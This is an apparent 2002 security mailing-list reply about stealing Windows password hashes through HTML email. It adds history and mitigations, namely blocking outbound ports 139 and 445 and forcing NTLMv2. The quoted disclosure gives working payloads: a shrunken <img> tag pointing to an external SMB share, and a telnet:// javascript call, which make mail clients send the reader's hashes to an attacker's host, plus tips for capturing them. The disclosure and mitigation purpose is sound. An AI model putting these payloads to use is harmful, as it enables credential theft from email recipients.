Re: Hijacking the hashes : multiple windows mail clients vulnerability

[Eric <ews () tellurian net>]

this technique has been known and discussed ad nauseum for several years, 
and was used in Sir Dystic's smbrelay tool, and was previously used many 
years earlier in a known attack presented by a fellow at University of 
Washington (my apologies - I forget who did this).  It may have also been 
discussed in recent Hacking Exposed books.

Proper network mitigation is to block outbound tcp 139 and 445 (why do 
people forget about 445?).  I believe forcing NTLMv2 can assist, as well as 
several other reg keys.

At 04:34 PM 7/3/2002 +0000, overclocking_a_la_abuela () hotmail com wrote:


> Hi men !
>
> Some time ago, Windows 2000 was kicked with a vulnerability that allowed
> an attacker to force a telnet session  to an external server. The telnet
> client tried to validate sending the hashes of the user... This could be
> exploited with a simple javascript "open.window("telnet://<IP>")" in an
> HTML formatted mail or with the very rude method of a link pointing to an
> URL using telnet scheme.
> Microsoft patched it and now windows 2000 asks you if you want to send
> your pawword,.... emmm, no thanks !  ;-)
>
> So, what about if there was another  method to force a user on a windows
> box to send you his hashes, without his knowledge, without using any
> interactive method, non javascript, non activeX, non some lame social
> engeneering technique... only HTML ?
>
> Here you have another flaw that is present on almost every Windows box
> that can be exploited to obtain the user´s password´s challenge/response
> hashes.
> Everybody knows that if a windows machine wants to access a SMB resource,
> always tries to connect first using the password of the user logued in.
> This "feature" is transparent to the user, so he never gets prompted to
> something like : "WARNING: you are about to send your password...".
>
> OK, that`s what we have found :
> simply send a html formatted mail message that includes this code :
>
> 1st) <img src="file://\\\\external_IP\\resource"> or 2nd) <img
> src="\\\\external_IP\\resource">.
>
> To make it "invisible" reduce the size of the "image" to the min.
>
> On mail clients that works with IE engine both methods seems to work :
> outlook, outlook express,...
>
> Any other web mail system  when using IE will  be forced to send hashes (
> tested with Outlook Web Access, Hotmail, ... ) unless the mail web server
> does any kind of filtering on HTML code.
>
> On Eudora  first technique will work only if IE is selected as viewer and
> the second one will work on both cases.
>
> An attacker only have to send you an e-mail as described before an wait
> for your response with a network monitor ( LC3 in sniffer mode works fine
> for this purpose ).
>
> Windows 2000 SP2 fully patched and  will be assimilated unless you force
> strong authentication ( not  on default installation ).
>
> Of course a tightened firewall denying outgoing trafic through port TCP
> 139 will prevent this but the problem is there and Windows users are
> exposed to the most easy way to stole their hashes : by e-mail.
>
> This vulnerability has been found by :
>
> HUGO VÁZQUEZ CARAMÉS and TONI CORTÉS.
> www.infohacking.com 2002
> Barcelona
> SPAIN